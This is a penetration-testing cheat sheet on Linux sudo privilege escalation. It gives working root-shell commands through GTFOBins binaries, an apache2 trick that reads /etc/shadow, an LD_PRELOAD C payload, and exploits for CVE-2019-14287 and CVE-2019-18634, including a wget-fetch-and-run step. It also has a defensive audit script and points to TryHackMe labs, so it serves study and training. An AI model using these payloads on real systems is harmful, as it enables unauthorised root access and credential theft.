# Sudo

## Enumeration

{% hint style="info" %}
Always check `sudo -l` at the beginning of the privilege escalation phase.
{% endhint %}

The command `sudo` allows the current user to execute certain commands as other users. To view a list of such commands:

```bash
sudo -l
```

In the trivial case, the current user can execute any command as any user:

![sudo -l](/files/-MfVN8UgPuybLMGXYDVp)

In this case we can spawn a root shell directly:

```bash
sudo /bin/bash -p
```

## Method 1: GTFOBins

For a privesc cheatsheet, check out GTFOBins:

{% embed url="https://gtfobins.github.io/" %}
GTFOBins
{% endembed %}

### Examples

If `find` is in `sudo -l`:

```bash
sudo find /bin -name nano -exec /bin/sh \;
```

If `awk` is in `sudo -l`:

```bash
sudo awk 'BEGIN {system("/bin/sh")}'
```

If `nmap` is in `sudo -l`:

```bash
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
```

If `vim` is in `sudo -l`:

```bash
sudo vim -c ':!/bin/sh'
```

## Method 2: Intended Functionality

### apache2

If `apache2` is in `sudo -l`, then we can read the root password hash from `/etc/shadow` by pointing it at that file as its config: the resulting syntax error echoes the first line of the file, which is root's entry:

```bash
sudo apache2 -f /etc/shadow
```

### wget

A `wget` privesc example:

{% embed url="https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/" %}
wget privesc
{% endembed %}

## Method 3: LD\_PRELOAD

`LD_PRELOAD` is an environment variable listing shared libraries that the dynamic loader (`/lib/ld-linux.so`) maps before any other library, so functions they define override the standard ones; `/etc/ld.so.preload` does the same system-wide. Sudo's default `env_reset` strips `LD_PRELOAD` from the environment, which is why the `env_keep` entry below matters.

If the Defaults shown by `sudo -l` keep `LD_PRELOAD` (`env_keep+=LD_PRELOAD`) and some command is permitted, for example `/usr/sbin/apache2`:

```
env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2
```

then we can utilize this "feature" for privilege escalation. Store the following C program in `/tmp`:

{% code title="x.c" %}

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h> // setgid()/setuid()

// Runs when the loader maps this library, before the target program's main()
void _init()
{
    unsetenv("LD_PRELOAD"); // Unset env LD_PRELOAD so the shell does not reload this library
    setgid(0); // Set GID to root
    setuid(0); // Set UID to root
    system("/bin/bash"); // Execute /bin/bash
}
```

{% endcode %}

Compile it:

```bash
gcc -fPIC -shared -o x.so x.c -nostartfiles
```

Trigger it with any sudo command (any command permitted by `sudo -l` works; here `apache2` is just an example):

```bash
sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2
```

Then we will get a root shell.

## Method 4: Attacking Sudo Itself

### CVE-2019-14287

{% embed url="https://www.exploit-db.com/exploits/47502" %}
sudo 1.8.27 - Security Bypass
{% endembed %}

If `sudo -l` shows we can execute `/bin/bash` as any user other than root:

```bash
(ALL, !root) /bin/bash
```

Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent, 4294967295), sudo would incorrectly treat it as 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.

That means we can get a root shell using the following payload:

```bash
sudo -u#-1 /bin/bash
```
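To make the parsing failure concrete, here is an added Python model (this page's own illustration, not sudo's source code; every function name is this example's own) that walks a `-u#<uid>` request through a lenient parse, an `(ALL, !root)` policy check and a `setresuid()`-style credential switch, next to the strict parse that rejects the reserved value. It simplifies sudo's real control flow to the three steps that matter for this bug.

```python
# Added illustration (not sudo's source): why "-1" slips past "(ALL, !root)"
# on an unsigned uid_t, and the strict parse that closes the hole.

UID_T_MAX = 0xFFFFFFFF          # uid_t is a 32-bit unsigned integer on Linux
NO_CHANGE_SENTINEL = UID_T_MAX  # setresuid() treats (uid_t)-1 as "leave unchanged"


def to_uid_t(value: int) -> int:
    """Mimic C's conversion of a (possibly negative) integer to uid_t."""
    return value & UID_T_MAX


def parse_uid_spec_lenient(spec: str) -> int:
    """Vulnerable-style parse: '#<n>' accepts any integer and wraps it into uid_t."""
    if not spec.startswith("#"):
        raise ValueError("expected a numeric '#<uid>' specification")
    return to_uid_t(int(spec[1:], 10))


def parse_uid_spec_strict(spec: str) -> int:
    """Hardened parse: reject negatives, out-of-range values and the -1 sentinel."""
    if not spec.startswith("#"):
        raise ValueError("expected a numeric '#<uid>' specification")
    body = spec[1:]
    if not body.isdigit():
        raise ValueError(f"uid must be an unsigned decimal integer: {body!r}")
    uid = int(body, 10)
    if uid > UID_T_MAX or uid == NO_CHANGE_SENTINEL:
        raise ValueError(f"uid out of range or reserved: {uid}")
    return uid


def runas_allowed(uid: int, excluded_uids=(0,)) -> bool:
    """Model of an '(ALL, !root)' rule: every uid is allowed except the excluded ones."""
    return uid not in excluded_uids


def effective_uid_after_switch(requested_uid: int, current_uid: int = 0) -> int:
    """Model setresuid(): the sentinel means 'do not change', so a process that is
    currently root (sudo runs setuid-root) simply stays root."""
    return current_uid if requested_uid == NO_CHANGE_SENTINEL else requested_uid


def simulate(spec: str, strict: bool) -> str:
    """Walk one request through parse -> policy check -> credential switch.
    Returns 'denied' when the parser or policy rejects it, otherwise the uid
    the command would actually run as, as a string."""
    parser = parse_uid_spec_strict if strict else parse_uid_spec_lenient
    try:
        uid = parser(spec)
    except ValueError:
        return "denied"
    if not runas_allowed(uid):
        return "denied"
    return str(effective_uid_after_switch(uid))


if __name__ == "__main__":
    for spec in ("#0", "#1000", "#-1", "#4294967295"):
        print(f"{spec:>12}  lenient={simulate(spec, False):>6}  strict={simulate(spec, True):>6}")
```

The lenient path never sees uid 0, so the `!root` exclusion is satisfied, yet the switch is a no-op and the command inherits sudo's root credentials; the strict parser refuses the request before any policy decision is made.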

Test this CVE in TryHackMe:

{% embed url="https://tryhackme.com/room/sudovulnsbypass" %}
Sudo Security Bypass - TryHackMe
{% endembed %}

### CVE-2019-18634

{% embed url="https://www.exploit-db.com/exploits/47995" %}
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
{% endembed %}

In `/etc/sudoers`, there is an option named `pwfeedback`, which is turned off by default. If it is turned on, sudo gives you "feedback" while you type your password by printing an asterisk for each character.

In Sudo 1.8.25p, this `pwfeedback` option leads to a buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:

```bash
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
```

Compile it:

```bash
gcc -o exploit exploit.c
```

Make it executable and run it:

```bash
chmod +x exploit ; ./exploit
```

Test this CVE in TryHackMe:

{% embed url="https://tryhackme.com/room/sudovulnsbof" %}
Sudo Buffer Overflow - TryHackMe
{% endembed %}
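All four methods above start from the same artefact, the output of `sudo -l`, so a defender can audit the same text for the same patterns: an unrestricted `ALL`, a permitted GTFOBins binary (Method 1 and 2), `env_keep+=LD_PRELOAD` (Method 3), a negated Runas such as `!root` (CVE-2019-14287) and the `pwfeedback` option (CVE-2019-18634). The script below is an added example written for this page, not a tool the page cites; the `sudo -l` sample it parses is constructed, and the binary list, rule identifiers and function names are this example's own.

```python
import re
import sys
from typing import List, Tuple

# Binaries the sections above show escaping to a shell or leaking file contents
# under sudo; extend the set from https://gtfobins.github.io/ as needed.
SHELL_ESCAPE_BINARIES = {"find", "awk", "nmap", "vim", "bash", "sh", "apache2", "wget"}

Finding = Tuple[str, str, str]  # (severity, rule id, detail)

# Constructed `sudo -l` output for the demonstration; it is not from a real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset, env_keep+=LD_PRELOAD, pwfeedback, mail_badpass

User alice may run the following commands on host:
    (root) NOPASSWD: /usr/sbin/apache2
    (ALL, !root) /bin/bash
    (root) /usr/bin/find
    (www-data) /usr/bin/systemctl status nginx
"""

# "(runas) [TAG: ...] command" as printed by sudo -l
COMMAND_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def parse_sudo_l(text: str):
    """Split `sudo -l` output into its Defaults options and per-command entries."""
    defaults, commands = [], []
    section = None
    for line in text.splitlines():
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
        elif line.startswith("User ") and "may run the following commands" in line:
            section = "commands"
        elif not line.strip():
            section = None
        elif section == "defaults":
            defaults.extend(opt.strip() for opt in line.split(","))
        elif section == "commands":
            commands.append(line.strip())
    return defaults, commands


def audit(text: str) -> List[Finding]:
    """Flag the sudo configurations this page describes as escalation paths."""
    defaults, commands = parse_sudo_l(text)
    findings: List[Finding] = []

    if any(d.startswith("env_keep") and "LD_PRELOAD" in d for d in defaults):
        findings.append(("high", "env_keep-LD_PRELOAD",
                         "LD_PRELOAD survives env_reset, so any permitted command can load a user-supplied library"))
    if "pwfeedback" in defaults:
        findings.append(("medium", "pwfeedback",
                         "pwfeedback is on; CVE-2019-18634 affected sudo 1.8.25p with this option enabled"))

    for entry in commands:
        match = COMMAND_RE.match(entry)
        if not match:
            continue  # continuation lines etc. are out of scope for this example
        runas, _tags, command = match.groups()
        runas_users = [u.strip() for u in runas.split(":")[0].split(",")]  # drop the group part
        command = command.strip()
        binary = command.split()[0].rsplit("/", 1)[-1]
        as_root = runas_users[0] in ("root", "ALL")

        if command == "ALL" and as_root:
            findings.append(("critical", "ALL-command", f"{entry}: unrestricted command execution as root"))
        elif binary in SHELL_ESCAPE_BINARIES and as_root:
            findings.append(("high", "gtfobins", f"{entry}: {binary} has a known shell escape or file-read path"))
        if any(u.startswith("!") for u in runas_users):
            findings.append(("medium", "runas-negation",
                             f"{entry}: negated Runas was bypassable with -u#-1 on sudo 1.8.27 and earlier (CVE-2019-14287)"))
    return findings


if __name__ == "__main__":
    # Usage: sudo -l | python3 sudo_audit.py   (uses the sample when stdin is a terminal)
    source = SAMPLE_SUDO_L if sys.stdin.isatty() else sys.stdin.read()
    for severity, rule, detail in audit(source):
        print(f"[{severity}] {rule}: {detail}")
```

On the sample the audit reports six findings: the kept `LD_PRELOAD`, `pwfeedback`, three GTFOBins binaries runnable as root (`apache2`, `bash`, `find`) and the negated Runas on the `/bin/bash` entry; the `systemctl` entry for `www-data` is not flagged. Running it against real `sudo -l` output is a quick way to confirm a hardening change (for example removing the `env_keep` line or replacing `(ALL, !root)` with an explicit user list) actually took effect.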

## Challenge: TryHackMe - Simple CTF

{% embed url="https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/simple-ctf-easy" %}
TryHackMe - Simple CTF
{% endembed %}
